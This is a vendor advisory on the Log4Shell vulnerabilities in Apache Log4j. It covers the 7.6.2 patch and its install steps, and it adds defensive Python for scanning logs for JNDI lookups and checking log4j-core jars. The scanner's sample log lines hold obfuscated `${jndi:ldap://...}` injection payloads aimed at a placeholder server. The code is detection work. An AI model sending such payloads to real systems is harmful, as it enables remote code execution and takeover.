“Log4Shell” Apache Vulnerability: What Kiteworks Customers Need To Know
Following our recent alerts to Kiteworks customers, three vulnerabilities have been disclosed in Apache Log4j, the Java-based open-source logging library. These vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) are collectively being referred to as Log4Shell (or, in some reporting, LogJam). Like Shellshock and Heartbleed before it, Log4Shell is remotely exploitable; the original flaw, CVE-2021-44228, allows unauthenticated remote code execution and therefore complete system takeover.
What General Risks Does Log4Shell Pose?
The first vulnerability was reported to Apache by Alibaba Cloud’s security team on November 24, 2021. CVE-2021-44228 is a critical vulnerability that affects the default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.
As noted in the press, the library is widely used in enterprise software, web applications, and products from Apple, Amazon, Cloudflare, Twitter, and Steam, among many others, exposing home users and enterprises alike to ongoing remote code execution attacks. As with Shellshock and Heartbleed, experts expect the number of vulnerable products identified to keep rising in the coming weeks.
Proof-of-concept (PoC) exploits are being shared online, and threat actors have already begun deploying malware that scans for vulnerable servers. Shortly after the initial zero-day disclosure and patch release, two additional Log4j vulnerabilities were discovered and patched: CVE-2021-45046 on December 14 (fixed in Log4j 2.16.0) and CVE-2021-45105, a denial-of-service (DoS) issue, on December 18 (fixed in Log4j 2.17.0).
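The scanning activity described above shows up in web-server and application logs as Log4j lookup strings, usually obfuscated with nested lookups or URL encoding so that a naive search for `${jndi:` misses them. The following is an added example, not code from the original post or from Kiteworks: it normalizes the common obfuscation forms (`${lower:…}`, `${upper:…}`, the `${name:-default}` default-value form including `${::-j}`, and URL encoding) and flags every line that resolves to a `${jndi:…}` lookup. The log lines are constructed samples using documentation addresses, and the helper names are the example's own.

```python
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further "${" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are actually looking for once obfuscation has been collapsed.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def resolve_inner(body):
    """Evaluate one un-nested lookup body the way attackers rely on Log4j
    evaluating it; return None when it is not one of the obfuscation forms."""
    if ":-" in body:                      # ${name:-default}, including ${::-j}
        return body.split(":-", 1)[1]
    if body[:6].lower() == "lower:":      # ${lower:J} -> j
        return body[6:].lower()
    if body[:6].lower() == "upper:":      # ${upper:n} -> N
        return body[6:].upper()
    return None


def normalize(text, max_rounds=20):
    """URL-decode (a few layers deep) and collapse nested lookups from the
    inside out until nothing more resolves; lookups we cannot evaluate, such
    as a benign ${price} template, are left in place."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            value = resolve_inner(match.group(1))
            if value is None:
                return match.group(0)
            changed = True
            return value

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan(lines):
    """Return (line index, de-obfuscated JNDI lookup) for every line that
    carries a ${jndi:...} lookup after normalization."""
    hits = []
    for i, line in enumerate(lines):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append((i, match.group(0)))
    return hits


# Constructed sample access-log lines (RFC 5737 documentation addresses,
# not real traffic). Lines 0-3 carry payloads in different disguises;
# lines 4-5 are benign, and line 5 contains a harmless ${...} template.
SAMPLE_LOGS = [
    '203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.11 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 612 "-" "${${lower:j}${upper:n}di:${lower:ldap}://203.0.113.7:1389/b}"',
    '203.0.113.12 - - [10/Dec/2021:14:02:13 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.7:1389/c} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '203.0.113.13 - - [10/Dec/2021:14:02:14 +0000] "GET /%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fd%7D HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.14 - - [10/Dec/2021:14:02:15 +0000] "GET /product/42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.15 - - [10/Dec/2021:14:02:16 +0000] "POST /api/render HTTP/1.1" 200 55 "-" "template=${price}"',
]

if __name__ == "__main__":
    for idx, payload in scan(SAMPLE_LOGS):
        print(f"line {idx}: {payload}")
```

The normalization deliberately resolves only the lookup forms attackers use to hide the string; anything else is left untouched so the output still shows the exact lookup that would have reached Log4j, which is what you want to carry into an incident ticket.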
How Does This Impact Kiteworks Customers?
While the recent Kiteworks 2021 Fall Release (7.6) includes the affected Apache library, our testing has shown no signs of exposure to any of these vulnerabilities. We attempted several of the publicly available PoC attacks with no indication of successful exploitation on the Kiteworks platform. We therefore do not currently consider this a P0 vulnerability in our systems, and we have no indication of Log4Shell being exploited against them. Additionally, Kiteworks’ multi-layered protection encrypts each stored file individually, which limits what a vulnerability of this kind could expose.
Install the Kiteworks 7.6.2 Security Patch
As a precaution, Kiteworks released the 7.6.2 software update to address these vulnerabilities. This patch release adds the mitigations for CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105 in the bundled Solr package, as recommended by the Apache Solr project. Specifically, it updates the Log4j library to a non-vulnerable version on CentOS 7 systems, and on both CentOS 6 and CentOS 7 it adds the JVM option Apache Solr recommends for solr.in.sh, SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true", which disables message lookups and so closes the attack vector. Note that Apache’s Log4j advisory rates the formatMsgNoLookups flag on its own as an incomplete mitigation for CVE-2021-45046 in non-default pattern layouts, and it does not address the CVE-2021-45105 recursion DoS; the library upgrade applied on CentOS 7 is the stronger fix.
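To verify what the patch actually changed on a host, check the log4j-core jar itself and the JVM options rather than relying on the product's version number. The following is an added example, not Kiteworks' or Apache's code: it reads a jar's Implementation-Version, checks whether JndiLookup.class is still present, looks for the formatMsgNoLookups flag in a SOLR_OPTS string, and reports a per-CVE status using the fixed-in versions from Apache's Log4j advisories (mainline plus the 2.12.x and 2.3.x backport lines). The jars scanned in demo() are constructed stand-ins written to a temporary directory; function names and status strings are the example's own.

```python
import os
import re
import tempfile
import zipfile

# Fixed-in versions per Apache's Log4j security advisories. The 2.3.x (Java 6)
# and 2.12.x (Java 7) lines received backported fixes; every other 2.x version
# is measured against the mainline fix.
FIXED_IN = {
    "CVE-2021-44228": {"main": (2, 15, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45046": {"main": (2, 16, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45105": {"main": (2, 17, 0), "2.12": (2, 12, 3), "2.3": (2, 3, 1)},
}
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NO_LOOKUPS_FLAG = re.compile(r"-Dlog4j2\.formatMsgNoLookups=true\b")


def parse_version(text):
    """Return (major, minor, patch) from the first x.y.z in text, else None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_jar(path):
    """Read the version (manifest first, filename as fallback) and whether the
    JndiLookup class is still present in a log4j-core jar."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        manifest = ""
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    version = None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            version = parse_version(line)
    if version is None:
        version = parse_version(os.path.basename(path))
    return version, JNDI_LOOKUP_CLASS in names


def branch_for(version):
    if version[:2] == (2, 12):
        return "2.12"
    if version[:2] == (2, 3):
        return "2.3"
    return "main"


def assess(version, jndi_present, no_lookups_flag):
    """Map one jar plus the JVM flag to a per-CVE status string."""
    status = {}
    branch = branch_for(version)
    for cve, fixes in FIXED_IN.items():
        if version >= fixes[branch]:
            status[cve] = "fixed"
        elif cve != "CVE-2021-45105" and not jndi_present:
            # Deleting JndiLookup.class removes the JNDI sink for both RCE
            # CVEs; it does nothing for the recursion DoS.
            status[cve] = "mitigated: JndiLookup removed"
        elif cve == "CVE-2021-44228" and no_lookups_flag and version >= (2, 10, 0):
            # The property only exists from 2.10; older jars ignore it.
            status[cve] = "mitigated: formatMsgNoLookups"
        elif cve == "CVE-2021-45046" and no_lookups_flag and version >= (2, 10, 0):
            # Apache rates this mitigation incomplete for 45046 when a
            # non-default pattern layout uses context lookups.
            status[cve] = "partially mitigated: formatMsgNoLookups"
        else:
            status[cve] = "vulnerable"
    return status


def scan_jar(path, solr_opts=""):
    """Inspect one jar and the SOLR_OPTS line it runs with."""
    version, jndi_present = inspect_jar(path)
    if version is None:
        raise ValueError(f"cannot determine Log4j version for {path}")
    flag = bool(NO_LOOKUPS_FLAG.search(solr_opts))
    return {"version": version, "jndi_lookup_present": jndi_present,
            "status": assess(version, jndi_present, flag)}


def build_sample_jar(directory, version, include_jndi=True):
    """Constructed stand-in for log4j-core: a manifest plus an empty class entry."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")
    return path


def demo():
    """Scan three constructed jars; returns {label: per-CVE status}."""
    solr_opts = 'SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"'
    cases = [
        ("2.14.1 with flag", "2.14.1", True, solr_opts),     # flag-only host
        ("2.14.1 JndiLookup removed", "2.14.1", False, ""),  # class deleted
        ("2.17.0", "2.17.0", True, ""),                      # upgraded library
    ]
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for label, version, keep_jndi, opts in cases:
            sub = os.path.join(tmp, label.replace(" ", "_"))
            os.makedirs(sub)
            jar = build_sample_jar(sub, version, include_jndi=keep_jndi)
            results[label] = scan_jar(jar, opts)["status"]
    return results


if __name__ == "__main__":
    for label, status in demo().items():
        print(label, status)
```

On a real host, point scan_jar at the log4j-core jar under the Solr installation and pass it the SOLR_OPTS line from solr.in.sh; the equivalent environment-variable form, LOG4J_FORMAT_MSG_NO_LOOKUPS=true, is not checked by this example.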
To install the 7.6.2 security update on Kiteworks:
- Sign into the Admin Console on your Kiteworks server.
- On the toolbar, click the System button.
- In the navigation pane, click Software Update.
- On the Software Update page, for the Software Version Opt-In setting, click General Availability.
- Near the bottom of the screen, click the Check for Update button. When an update is found, verify that the version number is 7.6.2 or higher.
- To install the update, click Download Software Update, and then click Run Software Update.
We continue to proactively monitor these vulnerabilities and will revise the above assessment if the threat landscape changes. If you have any questions or issues regarding Log4Shell or the 7.6.2 patch, please contact Kiteworks Support.